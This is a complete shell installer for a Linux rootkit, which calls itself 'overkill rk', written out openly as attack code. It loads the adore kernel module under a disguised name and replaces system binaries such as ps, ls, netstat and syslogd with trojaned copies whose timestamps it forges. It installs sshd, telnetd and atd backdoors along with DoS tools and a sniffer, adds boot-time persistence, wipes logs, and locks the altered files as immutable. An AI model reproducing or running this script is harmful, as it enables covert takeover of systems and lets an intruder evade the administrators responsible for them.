#!/bin/sh cl="" cyn="" wht="" hblk="" hgrn="" hcyn="" hwht="" hred="" unset HISTFILE PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:/usr/local/bin chattr -iau /etc/rc.d/init.d/sshd /etc/rc.d/init.d/syslog /etc/rc.d/init.d/functions /usr/bin/chsh /etc/rc.d/init.d/atd >/dev/null 2>&1 chattr -iau /usr/local/sbin/sshd /usr/sbin/sshd /bin/ps /bin/netstat /bin/login /bin/ls /usr/bin/du /usr/bin/find /usr/sbin/atd >/dev/null 2>&1 chattr -iau /usr/bin/pstree /usr/bin/killall /usr/bin/top /sbin/fuser /sbin/ifconfig /usr/sbin/syslogd /sbin/syslogd >/dev/null 2>&1 chattr -iau /etc/rc.d/init.d/inet /usr/sbin/nfsd /etc/rc.d/init.d/xinetd /usr/bin/shad /usr/bin/ava /usr/sbin/in.telnetd >/dev/null 2>&1 rm -f /var/lock/subsys/atd killall -9 atd >/dev/null 2>&1 killall -9 syslogd >/dev/null 2>&1 cp -f syslogd.init /etc/rc.d/init.d/syslog >/dev/null 2>&1 if [ -f /etc/rc.d/init.d/syslogd ]; then cp -f syslogd.init /etc/rc.d/init.d/syslogd >/dev/null 2>&1 fi /etc/rc.d/init.d/syslog stop >/dev/null 2>&1 echo echo " _-^--^=-_ " echo " _.-^^ -~_ " echo " _-- --_ " echo " < >) " echo " | ${cl}${cyn}-=${cl}${hblk}[${cl}${hgrn}overkill rk${cl}${hblk}]${cl}${cyn}=-${cl}${wht} |" echo " \._ _./ " echo " \`\`\`-. . , ; .--''' " echo " | | | " echo " .-=|| | |=-. " echo " \`-=#$%&%$#=-' " echo " | ; :| " echo " _____.,-#%&$%#&#~,._____ " echo if [ ! -d /etc/rc.d/init.d ] || [ ! -d /etc/rc.d/rc0.d ]; then echo "${cl}${hred}Argh!! .. SysV init not found${cl}${wht}" echo "${cl}${hred}Installation aborted.${cl}${wht}" /etc/rc.d/init.d/syslog start >/dev/null 2>&1 exit 1 fi ADORE=0 echo -n "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Trying to install adore...${cl}${wht}" cd adore-0.42 ./configure >/dev/null 2>&1 make >/dev/null 2>&1 if [ -f adore.o ] && [ ! "`2>&1 depmod adore.o cleaner.o >/dev/null`" ]; then echo " ok !" mkdir -p /lib/modules/`uname -r`/block mv -f adore.o /lib/modules/`uname -r`/block/nfs-init.o mv -f cleaner.o /lib/modules/`uname -r`/block/ mv ava /usr/bin echo ADORE=1 fi cd .. if [ "$ADORE" = "0" ]; then cd adore-0.34 ./build >/dev/null 2>&1 if [ -f adore.o ] && [ ! "`2>&1 depmod adore.o cleaner.o >/dev/null`" ]; then echo " ok !" mkdir -p /lib/modules/`uname -r`/block mv -f adore.o /lib/modules/`uname -r`/block/nfs-init.o mv -f cleaner.o /lib/modules/`uname -r`/block/ mv ava /usr/bin echo ADORE=1 fi cd .. fi if [ "$ADORE" = "0" ]; then echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${hred} *** failed ***${cl}${wht}" fi if [ ! -x /usr/bin/md5sum ]; then cp -f md5sum /usr/bin fi mkdir -p /etc/sysconfig/console/ cp -f filez/* /etc/sysconfig/console/ touch -acmr /etc/rc.d/init.d/atd atd.init >/dev/null 2>&1 touch -acmr /etc/rc.d/init.d/syslog syslogd.init >/dev/null 2>&1 touch -acmr /etc/rc.d/init.d/sshd sshd/init.sshd >/dev/null 2>&1 touch -acmr /usr/bin/chsh chsh >/dev/null 2>&1 touch -acmr /usr/bin/du du >/dev/null 2>&1 touch -acmr /usr/bin/find find >/dev/null 2>&1 touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1 touch -acmr /usr/bin/killall killall >/dev/null 2>&1 touch -acmr /bin/login login >/dev/null 2>&1 touch -acmr /usr/sbin/atd md5bd >/dev/null 2>&1 touch -acmr /bin/netstat netstat >/dev/null 2>&1 touch -acmr /bin/ps ps >/dev/null 2>&1 touch -acmr /bin/ls ls >/dev/null 2>&1 touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1 touch -acmr `which syslogd` syslogd >/dev/null 2>&1 touch -acmr /usr/bin/top top >/dev/null 2>&1 touch -acmr /usr/sbin/in.telnetd in.telnetd >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing trojaned programs...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}chsh" chmod +s chsh cp -f chsh /usr/bin/chsh >/dev/null 2>&1 chown root.root /usr/bin/chsh echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ps" cp -f ps /bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}top" cp -f top /usr/bin/ >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}pstree" cp -f pstree /usr/bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}killall" cp -f killall /usr/bin/ >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ls" cp -f ls /bin/ >/dev/null 2>&1 cp -f ls /usr/bin/dir echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}find" cp -f find /usr/bin echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}du" cp -f du /usr/bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}netstat" cp -f netstat /bin/ >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}syslogd" cp -f syslogd `which syslogd` >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}ifconfig" cp -f ifconfig /sbin/ifconfig >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}log cleaner" cp -f clean /usr/bin echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}wp" cp -f wp /usr/bin/wp echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}shad" cp -f shad /usr/bin echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing backdoors...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}md5bd" cp -f md5bd /usr/sbin/atd cp -f atd.init /etc/rc.d/init.d/atd echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}telnetd" cp -f in.telnetd /usr/sbin if [ -x /sbin/chkconfig ]; then /sbin/chkconfig --add atd else ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc0.d/K60atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc1.d/K60atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc2.d/K60atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc3.d/S40atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc4.d/S40atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc5.d/S40atd >/dev/null 2>&1 ln -s /etc/rc.d/init.d/atd /etc/rc.d/rc6.d/K60atd >/dev/null 2>&1 fi echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing DoS programs...${cl}${wht}" echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}vadim" cp -f vadim /usr/bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}slice" cp -f slice /usr/bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}--- ${cl}${wht}stealth" cp -f stealth /usr/bin >/dev/null 2>&1 echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing ettercap...${cl}${wht}" cd ettercap if [ ! -f /usr/lib/libcrypto.so ]; then cp libcrypto.so.0.9.4 /usr/lib ln -s /usr/lib/libcrypto.so.0.9.4 /usr/lib/libcrypto.so.0 ln -s /usr/lib/libcrypto.so.0 /usr/lib/libcrypto.so fi if [ ! -f /usr/lib/libform.so ]; then cp libform.so.4 /usr/lib ln -s /usr/lib/libform.so.4 /usr/lib/libform.so fi if [ -f /usr/lib/libform.so.5 ]; then ln -s /usr/lib/libform.so.5 /usr/lib/libform.so.4 fi if [ ! -f /usr/lib/libssl.so ]; then cp libssl.so.0.9.4 /usr/lib ln -s /usr/lib/libssl.so.0.9.4 /usr/lib/libssl.so.0 ln -s /usr/lib/libssl.so.0 /usr/lib/libssl.so fi if [ -f /usr/lib/libncurses.so.5 ]; then ln -s /usr/lib/libncurses.so.5 /usr/lib/libncurses.so.4 fi if [ -f /lib/libncurses.so.5 ]; then ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 fi /sbin/ldconfig >/dev/null 2>&1 if [ ! -d /usr/local/games ]; then mkdir -p /usr/local/games >/dev/null 2>&1 fi cp ettercap /usr/local/games cp parse /usr/local/games cd .. echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Installing sshd backdoor...${cl}${wht}" cd sshd ./sshd-install >/dev/null 2>&1 cd .. if [ "$1" = "mech" ]; then cd mech ./install cd .. fi if [ -f /etc/rc.d/init.d/functions ]; then cat functions >>/etc/rc.d/init.d/functions else cat functions >/etc/rc.d/init.d/functions chmod +x /etc/rc.d/init.d/functions >/dev/null 2>&1 fi if [ -f /etc/rc.d/init.d/xinetd ]; then /etc/rc.d/init.d/xinetd stop >/dev/null 2>&1 touch -acmr /etc/rc.d/init.d/xinetd xinetd /dev/null 2>&1 cp -f xinetd /etc/rc.d/init.d >/dev/null 2>&1 /etc/rc.d/init.d/xinetd start >/dev/null 2>&1 /sbin/chkconfig --add xinetd else /etc/rc.d/init.d/inet stop >/dev/null 2>&1 touch -acmr /etc/rc.d/init.d/inet inet >/dev/null 2>&1 cp -f inet /etc/rc.d/init.d >/dev/null 2>&1 if [ -x /sbin/chkconfig ]; then /sbin/chkconfig --add inet else ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc0.d/K50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc1.d/K50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc2.d/K50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc3.d/S50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc4.d/S50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc5.d/S50inet >/dev/null 2>&1 ln -s /etc/rc.d/init.d/inet /etc/rc.d/rc6.d/K50inet >/dev/null 2>&1 fi /etc/rc.d/init.d/inet start >/dev/null 2>&1 fi /etc/rc.d/init.d/atd start >/dev/null 2>&1 #echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Setting up crontab entries...${cl}${wht}" #crontab -u operator crontab-entry if [ ! -x /usr/sbin/lsof ]; then cp lsof /usr/sbin fi echo "${cl}${hgrn}open ports:${cl}${wht}" if [ -x /usr/sbin/lsof ]; then /usr/sbin/lsof|grep LISTEN|egrep -v http|egrep -v auth|awk -F ' ' ' {print $8 " " $1 " " $2}' else /bin/netstat -a|grep LISTEN|grep tcp|egrep -v http|egrep -v auth fi echo "${cl}${hgrn}checking for other rootkits:${cl}${wht}" if [ -d /dev/ida/.inet ]; then echo "${cl}${hred}/dev/ida/.inet <- fuking lamerz in here :(${cl}${wht}" fi if [ -f /usr/bin/hdparm ]; then echo "${cl}${hred}/usr/bin/hdparm${cl}${wht}" fi if [ -d /dev/.rd ]; then echo "${cl}${hred}/dev/.rd${cl}${wht}" fi if [ -d /dev/.kork ]; then echo "${cl}${hred}/dev/.kork${cl}${wht}" fi if [ -d /var/run/.pid ]; then echo "${cl}${hred}/var/run/.pid${cl}${wht}" fi if [ "`locate alya.cgi 2>/dev/null`" ]; then echo "${cl}${hred}alya.cgi${cl}${wht}" locate alya.cgi 2>/dev/null fi if [ -x /usr/bin/sourcemask ]; then echo "${cl}${hred}/usr/bin/sourcemask${cl}${wht}" fi if [ -x /etc/rc.d/init.d/init ]; then echo "${cl}${hred}/etc/rc.d/init.d/init${cl}${wht}" fi if [ "`locate c700 2>/dev/null`" ]; then echo "${cl}${hred}c700${cl}${wht}" locate c700 2>/dev/null|head -n 5 fi if [ -d /var/spool/cron/".. "/.zoot/ ] || [ "`locate zoot 2>/dev/null`" ]; then echo "${cl}${hred}zoot..${cl}${wht}" locate zoot 2>/dev/null|head -n 5 fi if [ "`locate rsha 2>/dev/null|egrep -v marshal`" ]; then echo "${cl}${hred}rsha :\\${cl}${wht}" locate rsha 2>/dev/null|head -n 5 fi if [ "`locate .. 2>/dev/null|egrep -v '1.gz'`" ]; then echo "${cl}${hred}hmm.. ${cl}${wht}" locate ..|egrep -v '1.gz'|head -n 10 fi if [ "`locate tcp.log 2>/dev/null`" ] || [ "`lsof|grep tcp.log`" ] || [ "`locate sniffer 2>/dev/null`" ]; then echo "${cl}${hred}sniffer logz${cl}${wht}" locate tcp.log 2>/dev/null /usr/sbin/lsof|grep tcp.log locate sniffer 2>/dev/null fi if [ "`locate .1proc 2>/dev/null`" ] || [ -d /usr/src/.puta ] || [ -f /etc/ttyhash ]; then echo "${cl}${hred}possible tk${cl}${wht}" fi if [ "`locate adore 2>/dev/null`" ]; then echo "${cl}${hred}possible adore lkm${cl}${wht}" fi if [ "`locate psybnc 2>/dev/null`" ]; then echo "${cl}${hred}hmm.. a fucking psybnc in here${cl}${wht}" locate psybnc 2>/dev/null|head -n 5 fi if [ "`locate mech.session 2>/dev/null`" ] || [ "`locate mech.set 2>/dev/null`" ]; then echo "${cl}${hred}aargh.. a stupid mech around${cl}${wht}" locate mech.session 2>/dev/null locate mech.set 2>/dev/null fi if [ "`locate eggdrop 2>/dev/null`" ]; then echo "${cl}${hred}oopz.. a muddafucking egg around${cl}${wht}" locate eggdrop 2>/dev/null|head -n 5 fi if [ "`locate sshdu 2>/dev/null`" ]; then echo "${cl}${hred}sshdu..${cl}${wht}" locate sshdu 2>/dev/null fi if [ "`ps -ax|grep "\./"|grep -v grep|grep -v install`" ]; then echo "${cl}${hred}suspect processes:${cl}${wht}" ps -ax|grep "\./"|grep -v grep|grep -v install fi echo "${cl}${hred}/dev filez:${cl}${wht}" find /dev -type f|grep -v MAKEDEV|grep -v ttyo echo "${cl}${hgrn}Done.${cl}${wht}" /etc/rc.d/init.d/syslog start >/dev/null 2>&1 ./clean restart unset cl cyn wht hblk hgrn hcyn hwht hred chattr +iau /etc/rc.d/init.d/inet /etc/rc.d/init.d/functions /etc/rc.d/init.d/atd /usr/bin/chsh >/dev/null 2>&1 chattr +iau /bin/ps /bin/netstat /bin/login /bin/ls /usr/bin/du /usr/bin/find >/dev/null 2>&1 chattr +iau /usr/sbin/atd /usr/bin/pstree /usr/bin/killall /usr/bin/top /sbin/fuser /sbin/ifconfig /usr/sbin/syslogd >/dev/null 2>&1 chattr +iau /sbin/syslogd /etc/rc.d/init.d/xinetd /usr/bin/shad >/dev/null 2>&1 echo echo "${cl}${cyn}|${cl}${hcyn}= ${cl}${hwht}Rootkit installed. Enjoy! :>${cl}${wht}" exit 0